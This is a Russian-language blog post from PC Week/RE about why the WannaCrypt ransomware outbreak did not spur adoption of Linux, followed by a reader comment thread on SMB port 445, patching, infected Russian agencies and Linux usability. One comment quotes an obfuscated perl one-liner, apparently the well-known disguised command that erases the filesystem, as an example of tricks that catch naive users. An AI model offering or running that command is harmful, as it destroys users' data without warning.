Блог

WannaCrypt и популяризация Linux

Сергей Голубев
24.05.2017 11:30:57
Теги: Linux

Больше всего в истории с WannaCrypt меня удивила реакция Linux-сообщества. Точнее — практически полное её отсутствие. Возможно, некоторую роль тут сыграли соображения этического характера — мол, нехорошо использовать чужое горе в пропагандистских целях. Но мне думается, что в действительности всё значительно сложнее.

Я смог найти только одну статью, в которой ситуация разобрана достаточно подробно — «WannaCrypt makes an easy case for Linux». Автор — Джек Валлен. Итак, вот перечисленные им факты:
• WannaCrypt обладает способностью к распространению самого себя;
• WannaCrypt использует уязвимость в ОС Windows;
• WannaCrypt использует протокол SMB, широко используемый в корпоративных сетях;
• WannaCrypt создан АНБ;
• WannaCrypt заразил системы в 150 странах мира.

Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет. С ним сложно не согласится и здравый смысл подсказывает, что вот сейчас уж точно начнётся массовый переход на свободное ПО.

Однако, объективность требует рассмотреть и другие аргументы. Например, отсутствие некоторого программного обеспечения, работающего в Linux. Правда, Джек Валлен считает, что растущая популярность модели SaaS делает этот аргумент ничтожным. И снова он прав.

Однако, интуиция мне подсказывает, что никакой массовой миграции не произойдёт. Несмотря на все призывы Джека Валлена и других сторонников СПО.

Возможно, агитация действительно лишена смысла? И прежде всего потому, что ни Джек Валлен, ни остальные пропагандисты не понимают, в чём причины феномена популярности Linux. Разумеется, я тут не исключение — для меня это тоже загадка.

Может быть, именно поэтому история с WannaCrypt практически не используется для популяризации Linux? Уязвимости Windows никак не влияют на популярность этой системы. Почему? Мы не знаем.

Комментариев: 28

Только зарегистрированные и авторизованные пользователи могут добавлять комментарии

24.05.2017 13:14:32

Цитата
Больше всего в истории с WannaCrypt меня удивила реакция Linux-сообщества. Точнее — практически полное её отсутствие.

Каким макаром должен касаться пользователей Линукс зловред написанный для другой платформы?!
Цитата
Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет.

Джек Валлен - капитан очевидность. Чую эксперд не спал ночами чтобы выяснить невозможность работы в Линукс зловреда, написанного исключительно для другой ОС.
Цитата
Однако, интуиция мне подсказывает, что никакой массовой миграции не произойдёт. Несмотря на все призывы Джека Валлена и других сторонников СПО.

Вспоминается небольшой анекдот про смекалку - "Это 3.14ец, смекнул рядовой Иванов, когда 15 штыков пригвоздили его к стенке".
Сергей, у вас потрясающее "шестое чувство". Берегите его.
Я уже слышу топот несметной толпы Виндоус-хомячков ломанувшихся за Пингвином. Процент Винды медленно, но уверенно опустился на 1.5%, а Пингвин занял всё процентное поле конкурента. Ура... Теперь за малым процентом распространения Винда перестала интересовать вирусописателей и к ней постепенно стала переходить слава самой безопасной ОС от Пингвина. А Пингвин, наслаждаясь долгожданной и выстраданной победой, начал медленно и уверено догонять по загаженности своего младшего родственника - Андроида.
Цитата
Уязвимости Windows никак не влияют на популярность этой системы. Почему? Мы не знаем.

А, вот мы знаем!
Кстати, тут здорово могла бы помочь, упомянутая в четвёртом абзаце снизу, интуиция smile;)

PS А зачем вообще красноглазым друзьям знать что-то про Виндоус?

26.05.2017 01:25:53

Донат, я заметил, вы часто тут мелькаете, при чем всегда с узконаправленными и как бы глубокомысленными (то есть вам, похоже, кажется именно так) комментариями. Ответьте, пожалуйста, на один вопрос: если вам так нравится продукция одной редмондской компании, что именно вы забыли в этом блоге, который -- вы, может, не обратили внимания -- посвящен ПО с открытым кодом? Тут умные люди собираются, обсуждают вопросы интересные... Не мешали бы вы им, а? Ваши посты столько места занимают, их настолько надоедает пролистывать, честное слово...

26.05.2017 01:54:09

Надоело... не пролистывайте!

27.05.2017 20:06:26

Орден Петросяна Донатику два раза! Я так хохотался от вашего искрометного йумора...
Но я таки рад, что вы не предложили читать весь этот бред.

27.05.2017 20:28:13

Цитата
Но я таки рад, что вы не предложили читать весь этот бред.

Для тех, у кого не хватает мозгов самим догадаться как и что делать, я всегда даю простые и добрые советы!
Обращайтесь!

27.05.2017 23:07:07

О, я смотрю, тут орденами Петросяна дело не обойдется, придется заодно присвоить Донатику и звание "Заслуженный имбецил всея интернета "

27.05.2017 23:36:57

Цитата
Но я таки рад, что вы не предложили читать весь этот бред.

Хотя детские блоги по другому адресу и тебя тошнит от моих комментариев, но мне очень приятно, что ты преодолеваешь себя и продолжаешь меня читать.
Искренне благодарю.Спасибо.

29.05.2017 15:43:37

Вот этот ваш тон однозначно способствует популяризации Linux.

24.05.2017 14:03:37

Цитата
сыграли соображения этического характера

У линукс сообщества, да smile:D
Цитата
Возможна ли такая ситуация в Linux. Автор статьи утверждает, что нет.

Пока линукс настолько непопулярный - конечно невозможна. Тут, знаете, как с неуловимым Джо.
Цитата

— А почему его зовут Неуловимым Джо, Билли?
— Потому что его никто ещё не поймал, Гарри.
— А почему его никто ещё не поймал, Билли?
— Потому что он нафиг никому не нужен, Гарри.

Но ситуация такова, что линукс безопасный не по своей природе, а благодаря продвинутости пользователей системы. Если за линуксом будут работать люди далекие от понимания системы, они с удовольствием будут работать из под рута, или введут административный пароль на фишинговый запрос зловреда.
Всем известны всякие программы в одну строчку, типа этой
Код
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

и т.д.

24.05.2017 14:38:50

Ну и насчет агитации в пользу линукс.

Линукс рассчитан на людей, который четко понимают, чего они хотят и какие инструменты им для этого нужны. Возьмем хотя бы дистрибутивы. Сколько их там? Я думаю, что ответ "дохрена" - будет более, чем правильный. И вот представьте, что новичок, пытается понять, что ему из этого всего нужно. У него разбегаются глаза, он не понимает, ЗАЧЕМ сколько дистрибутивов. Он заходит на форум и просит совета. А ему: "Ну для новичка подойдет Debian, Ubuntu, Mint, Elementay OS, OpenSuse". Он думает: "Блин, что выбрать-то? О, Убунту я вроде где-то слышал, поставлю её." Смотрит, а там Ubuntu, Lubuntu, Kubuntu,Xubuntu. "Чё за?", - думает человек? А это среды рабочего стола, отвечает ему сообщество. У человека вообще кругом голова идти начинает. Он думает: "Слишком сложно, до свиданья".
Далее, если человек таки устанавливает систему, то начинается долги и мучительный квест по её настройке под себя. Допустим, человек обнаруживает, что в OpenSuse с KDE по умолчанию нет ярлыков на рабочем столе, а само рабочее пространство забито какими-то виджетами.
Или, например, что в Elementary OS не работает нормальное переключение раскладок клавиатуры. И что ему нужно вводить всякую дичь, типа:

Код
gsettings set org.pantheon.desktop.gala.keybindings switch-input-source "['<Alt>Shift_L', '<Alt>Shift_R', '<Shift>Alt_L', '<Shift>Alt_R']"

А дальше, если он таки продрался через дебри кастомизации - ему обязательно предстоит встретится с проблемами. Ну, например, дефолтовый плеер в Elementary OS вылетает каждые 5-10 минут, при проигрывании некоторых файлов.

И вас уверяю, мало кого интересуют такого рода квесты.

Так что пока ситуация не изменится - никакая агитация тут не поможет.

24.05.2017 14:39:03

А я вот не встречал сообщений об успешных атаках WannaCrypt на коммерческие и облачные ЦОДы. Если им действительно удалось отбиться (а там ведь есть системы на Windiws Server), то это будет сильный аргумент в пользу облаков.

24.05.2017 14:42:28

Ну само собой, не все же оставляют 445 порт открытым и игнорируют обновления безопасности smile:D

24.05.2017 15:02:13

Цитата
Если им действительно удалось отбиться

Не отбивались они не от чего. По умолчанию 445 порт на внешних интерфейсах граничных устройств (фаерволах) закрыт.
Его можно открыть принудительно, только по глупости. Но и просто открыть мало. Что бы он сработал, какой-либо сервис, должен его "слушать".

24.05.2017 18:26:19

То есть, МВД, ГИБДД и прочие конторы продемонстрировали свою "особую" бдительность. smile:o Заманили вирус. smile8)

24.05.2017 18:44:47

Плюс Мегафон!

24.05.2017 19:41:07

МВД писало, что сотрудники отключали рабочие компьютеры от основной сети и подключали разными способами к Интернету. Это конечно кое-что проясняет, но на самом деле, вызывает ещё больше вопросов.

25.05.2017 03:22:32

То, что сотрудники МВД подключались к интернету "разными способами" по-моему вполне логично. Странно было-бы вести оперативную работу и светиться IP МВД,. А вот как объяснить удачные атаки на Мегафон и испанскую телекоммуникационную компанию «Telefónica»? Там ведь работают профи! Не думаю, что они специально светили 445 порт и не ставили обновы.

25.05.2017 07:37:14

Цитата
То, что сотрудники МВД подключались к интернету "разными способами" по-моему вполне логично. Странно было-бы вести оперативную работу и светиться IP МВД

Какая оперативная работа, каким IP не светиться? Господи, что за бред?! Это за "вполне логичную" следственную работу руководство МВД проводит служебную проверку и квалифицирует, как "нарушение отдельными сотрудниками использования информационных средств"?!
Цитата
А вот как объяснить удачные атаки на Мегафон и испанскую телекоммуникационную компанию «Telefónica»?

Мегафон, а так же в Минздрав и РЖД тоже "вели оперативную работу"?

26.05.2017 05:51:29

Цитата
Какая оперативная работа, каким IP не светиться? Господи, что за бред?!


Объяснитесь, пожалуйста. Вы знаток работы ИТ в силовых ведомствах? или так...
Я вот не знаток, могу только предполагать, просветите!


26.05.2017 08:11:06

А вы?

26.05.2017 09:30:49

Что я? Я могу только предполагать! Я и пишу, что предполагаю. Вы же обзываете мои предоложение бредом. Так хоть потрудитесь объясниться? Вы же в приличном обществе.

26.05.2017 10:20:41

Нет никаких "знатоков работы ИТ в силовых ведомствах". Нет никакой единой структуры ИТ ни в одном силовом ведомстве. Силовые ведомства разные. У каждого своя специфика. Кроме всего прочего, это территориально-распределённые структуры. ИТ в них строится одной стороны на общей специфике ИТ-ой области в целом, а так же на специфике каждого силового ведомства в отдельности. И да, я работал в ИТ в двух силовых ведомствах - ВС РФ и МВД.
Как вам помогла это информация? Вам стало лучше понятна специфика произошедшего инцидента? Что изменилось? Вы перестали обижаться на слово "бред"?

26.05.2017 11:43:25

Смею поставить Ваши утверждения под сомнение. Как тогда зараза поразила столько регионально разбросанных по стране персональных компьютеров МВД, если нет общей инфраструктуры?

26.05.2017 12:43:46

У меня два вопроса - первый - что вы подразумеваете под "общей инфраструктурой" и,второй, о каких IP-адресах МВД вы ведёте речь?

26.05.2017 20:38:12

Отвечать вопросом на вопрос как-то некомильфо, ну да ладно. Повторюсь, понятия не имею, как организована ИТ инфраструктура МВД, но массовое заражение именнно через самбу дает мне основания предполагать, что либо персональные компьютеры сотрудников видят друг друга по этому протоколу, либо заражение шло через общий сервер (но это в МВД отрицают, ибо сервера не пострадали). Каким образом они видят друг друга вопрос технически несложный, важнее вопрос почему не было никакой защиты внутри сетей.
IP МВД... ну есть же у каждого конкретного подразделения выход в Интернет, значит есть и IP. Думаю кому надо знают их все и во всех регионах.

25.05.2017 07:42:08

Цитата
Там ведь работают профи! Не думаю, что они специально светили 445 порт и не ставили обновы.

Если там "крутые профи", порты закрыты и ставятся обновления - каким образом они "намотали на винт" зловреда?!

26.05.2017 06:58:07

ЦОД'ы чистой Windows в сети не светятся.
Мне особо не попадались ЦОД'ы с открытым портом SMB протокола наружу - обычно используют другое ПО для доступа к расшаренным данным.

12.07.2017 15:54:33

в Украине, после июньской атаки, Приват-банк (вроде, крупнейший в мире корпорат.пользователь Убунту) предложил госсектору свой дистрибутив ПриватЛинукс (но, сдаётся мне, микрософт и госсектор (вернее, людей, ответственных в нём за принятие решений) связывает не только бескорыстная дружба)

Только зарегистрированные и авторизованные пользователи могут добавлять комментарии

Интересно

Статьи

Применение кейсов делает прохождение проверки Центробанка прозрачным процессом с минимальными рисками
Технология адаптивного кейс-менеджмента позволила банку ВТБ существенно оптимизировать бизнес-процессы...

АО “Транснефть — Прикамье”: опыт создания электронных хранилищ документов
Полноценная реализация процессного подхода к управлению бизнесом возможна только на прочном фундаменте …

ИТАР-ТАСС создает национальное хранилище печатных и электронных изданий
Постановлением правительства РФ от 07.04.2017 N 420 утверждено положение о деятельности …

Государственная электронная почта: опыт Германии и России
Электронные средства коммуникации развиваются уже не один десяток лет, обеспечивая быструю и удобную передачу …

“1С” обкатает новую версию “1С:Документооборота” на проекте в “Почте России”
С конца прошлого десятилетия автоматизация управления документами из нишевого направления информатизации …

Мы в социальных сетях

PC Week/RE в Facebook PC Week/RE в Контакте PC Week/RE в Google+ PC Week/RE в Одноклассниках PC Week/RE в Twitter

Решения

Исследование DIRECTUM: Готовы ли российские компании к облакам?
Изменения отношения к облачным технологиям — очевидны. Но нам интереснее увидеть больше конкретики по рынку СЭД, тем …

Анализ и визуализация данных в СЭД CompanyMedia
Универсальное аналитическое решение в составе СЭД CompanyMedia, ориентировано на сбор, агрегацию, обработку и …

«ИнтерТраст» предлагает готовые проекты документов, регламентирующих использование электронной подписи и электронного контента
Компания «ИнтерТраст» расширяет спектр услуг по обеспечению правомерности использования электронных документов …

Автоматизация работы с агентами. Опыт Synerdocs в СПАО «Ингосстрах»
В 2014 году одна из крупнейших страховых компаний России — СПАО «Ингосстрах» — приняла решение …

Переход на электронные документы в отдельно взятой торговой сети. Пример Synerdocs и Wildberries
В конце 2014 года крупнейший российский интернет-магазин Wildberries объявил своим партнерам о переводе обмена …

Блог

Кто и как хранит документы по электронному деловому взаимодействию (е-инвойсинг)?
Этот вопрос почему-то до сих практически никак не затрагивается в обсуждениях на тему делового элект ...

Как выглядит бумажно-электронный документооборот (на примере Правительства Москвы)
Публикация на прошлой неделе поста "Когда же наступит время реального электронного документооборота? ...

Не построив электронный документооборот, приступаем к построению "цифрового рабочего пространства"
Вот какие рекомендации я прочитал на днях в отчете (в переводе известной российской ИТ-компании) авт ...

Когда же наступит время реального электронного документооборота?
Термин "электронный документооборот" появился еще в середине 1990-х годов, а в начале нового века уж ...

Электронное взаимодействие граждан с государством. Нужно ли нам оно?
Тезис о том, что "электронное взаимодействие лучше бумажного", как минимум спорен. Он будет верным, ...

 

Лидеры читательского рейтинга

Статьи

Записи в блогах

Панорама

История успеха: Dab Pumps значительно повышает свою производительность во всем мире с помощью Infor
Dab Pumps — ведущий поставщик оборудования, который ежегодно производит 3 миллиона приводных водяных насосов.
Облачные вычисления с VMware vCloud Air Network
Для разных компаний требуются разные стратегии облачных вычислений, но все они будут использовать облако.
Новые горизонты офисной техники
Компания HP выпустила новые печатающие устройства для офиса формата A3. Устройства созданы...
Гиперконвергированная инфраструктура, отвечающая современным требованиям ведения бизнеса
Цифровая экономика изменила все аспекты ведения бизнеса. Пользователи становятся более требовательными, технологии постоянно развиваются, и от ИТ-отделов ожидают большей адаптивности и быстроты реагирования, чем прежде.
“Без своевременной и качественной обработки данных компания теряет конкурентоспособность”
Когда бизнес переживает этап роста, на ИТ-отдел обрушивается огромная нагрузка, справиться с которой удается …

Интересно

 

Создание сайта - студия iMake
© 2017 АО «СК ПРЕСС».
Информация об авторских правах и порядке использования материалов сайта.
Правила поведения на сайте.

На главную PC Week/RE  |  Об издании  |  Архив номеров  |  Подписка на бумажную версию
Другие проекты «СК ПРЕСС»ITRNБестселлеры IT-рынкаByte/РоссияCRN/REIntelligent Enterprise/REPC Magazine/RE.